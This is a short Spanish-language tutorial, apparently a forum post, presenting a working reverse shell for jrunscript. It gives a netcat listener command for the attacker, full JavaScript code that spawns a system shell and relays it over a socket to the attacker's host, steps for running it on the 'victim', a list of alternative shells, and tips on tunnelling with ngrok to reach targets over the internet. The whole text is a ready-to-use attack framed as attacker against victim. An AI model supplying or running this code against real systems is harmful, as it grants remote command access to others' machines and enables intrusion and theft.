hola a qui les presento una shell inversa en jrunscript


paso a explicar los comandos mas importantes recuerda el atacante y la victima tienen que usar el mismo puerto y estar dentro de la misma red si quieres atraves de wan tienes que usar un tunel XD
1
primer paso preparando el listener en el
atacante en el puerto 9001
nc -lvnp 9001
2 modifica la primera linea del script para que use el
ip del atacante y un puerto recuerda los puertos tienen que coincidir
main( "localhost",9001,"cmd");
function main(host,port,cmd) {
try {
p = new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();
s = new java.net.Socket(host, port);
pi = p.getInputStream();
pe = p.getErrorStream();
si = s.getInputStream();
po = p.getOutputStream();
so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
java.lang.Thread.sleep(50);
try {
p.exitValue();
break;
} catch ( e) {/*e.printStackTrace();*/}
}
p.destroy();
s.close();
} catch ( e) {e.printStackTrace();}
}
3 ejecutar script shell.js en la victima usando el ip del atacante y cmd para los que odian al los pinwinos o
jrunscript shell.js
otras opciones dependiendo de el sistema operativo y las configuraciones puede funcionar alguno
sh
/bin/sh
bash
/bin/bash
cmd
powershell
pwsh
ash
bsh
csh
ksh
zsh
pdksh
tcsh
fuentes y herramientas
un builder de shell reversa online
https://www.revshells.com/y con ngrok te haces un tunel